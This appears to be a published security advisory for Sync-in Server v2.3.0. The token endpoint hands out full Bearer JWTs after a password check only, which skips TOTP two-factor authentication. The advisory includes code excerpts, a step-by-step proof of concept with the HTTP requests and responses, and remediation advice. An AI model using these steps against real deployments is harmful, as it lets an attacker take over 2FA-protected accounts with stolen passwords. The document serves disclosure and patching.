Sync-in Server has a complete 2FA Bypass via `POST /api/auth/token`
위협 신호 · CVSS · EPSS · KEV
이론적 심각도 점수
예측 데이터 없음
실측 악용 기록 없음
계획된 패치 주기 내 조치(60일 이내)
CVSS 벡터 · 메트릭
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N상세 설명
Affected component: Sync-in Server v2.3.0, POST /api/auth/token (auth.controller.ts:50-55).
Required attacker capability: Valid username and password for a 2FA-enabled account.
Summary
POST /api/auth/token authenticates with username and password only, then calls getTokens(), which returns unrestricted Bearer access and refresh JWTs without checking whether the account has TOTP 2FA enabled. An attacker who already knows valid credentials for a 2FA-enabled account can bypass 2FA in a single request.
The parallel login endpoint (POST /api/auth/login) correctly enforces 2FA by calling setCookies(user, res, true), which gates on user.twoFaEnabled when server-side TOTP is enabled.
Details
The token endpoint at auth.controller.ts:50-55 uses AuthLocalGuard (password-only) and calls getTokens() directly:
1// auth.controller.ts:50-55 2@Post(AUTH_ROUTE.TOKEN) 3@AuthTokenSkip() 4@UseGuards(AuthLocalGuard) 5token(@GetUser() user: UserModel): Promise<TokenResponseDto> { 6 return this.authManager.getTokens(user) 7}getTokens() at auth.service.ts:25-39 signs and returns access and refresh JWTs. It never reads user.twoFaEnabled:
1// auth.service.ts:25-39 2async getTokens(user: UserModel, refresh = false): Promise<TokenResponseDto> { 3 const currentTime = currentTimeStamp() 4 // ...expiration logic... 5 return { 6 [TOKEN_TYPE.ACCESS]: await this.jwtSign(user, TOKEN_TYPE.ACCESS, accessExpiration), 7 [TOKEN_TYPE.REFRESH]: await this.jwtSign(user, TOKEN_TYPE.REFRESH, refreshExpiration), 8 // ... 9 }10}Compare with the login endpoint at auth.controller.ts:30-35, which calls setCookies(user, res, true). Inside setCookies() at auth.service.ts:45, the 2FA gate fires:
1// auth.service.ts:45 2const verify2Fa = init2FaVerify && configuration.auth.mfa.totp.enabled && user.twoFaEnabledWhen verify2Fa is true, setCookies() issues only a restricted ACCESS_2FA token and requires the user to complete POST /api/auth/2fa/login/verify before receiving full session cookies. The token endpoint has no equivalent gate.
PoC
Prerequisites
- A Sync-in instance with TOTP 2FA enabled server-wide.
- A user account with 2FA enrolled (the target).
- The target's valid login and password, but not the TOTP secret or current TOTP code.
Steps
-
Enable 2FA on the target account. Log in as the target user, navigate to Settings, and enable TOTP two-factor authentication.
-
Confirm normal login requires 2FA. Log out. Log back in with the target's credentials. The UI presents a TOTP code prompt before granting access, and the API response contains only
token.access_2fa_expiration(a restricted partial token):
1POST /api/auth/login 2{"login":"test","password":"..."} 3 4Response: {"user":{"twoFaEnabled":true},"server":{"twoFaEnabled":true},"token":{"access_2fa_expiration":1781234379}}- Bypass 2FA via the token endpoint. Send the same credentials to
/api/auth/token:
1POST /api/auth/token 2{"login":"test","password":"..."} 3 4Response: 5{ 6 "access": "eyJhbGciOiJIUzI1NiIs...", 7 "refresh": "eyJhbGciOiJIUzI1NiIs...", 8 "access_expiration": 1781235890, 9 "refresh_expiration": 178124849010}Unrestricted Bearer access and refresh JWTs are returned. No TOTP code was required.
- Confirm API access. Use the token on a protected endpoint:
1GET /api/users/me 2Authorization: Bearer eyJhbGciOiJIUzI1NiIs... 3 4Response: {"user":{"id":16,"login":"test","email":"test@lab.local","twoFaEnabled":true,...}}The server returns the user profile. Protected API endpoints that accept Bearer authentication are accessible as the target user. No TOTP code was required at any step.
Measured observations
- The login endpoint (
/api/auth/login) correctly returns a restricted 2FA-pending response. - The token endpoint (
/api/auth/token) returns unrestricted Bearer JWTs with the same credentials and no TOTP. - The returned Bearer token grants access to protected API endpoints as a fully authenticated user, though cookie-specific flows may differ.
Impact
An attacker who already knows valid credentials for a 2FA-enabled account can obtain unrestricted Bearer access and refresh JWTs in a single HTTP request, without knowing the TOTP secret or possessing the authenticator device. 2FA security is bypassed for Bearer-token API authentication.
Remediation
Gate the token endpoint behind the same 2FA policy used by the login route. After AuthLocalGuard validates the username and password, require a valid TOTP code when server-side TOTP is enabled and user.twoFaEnabled is true, before calling getTokens().
AI 심층 분석
공격 시나리오 · 재현 가능한 PoC 페이로드 · 즉시 적용 가능한 차단 패치를 한 번에 받아 보세요. 보안 운영팀이 그대로 점검·티켓팅에 쓸 수 있는 형태로 정리해 드립니다.
참고 자료 6
링크 내용 불러오는 중…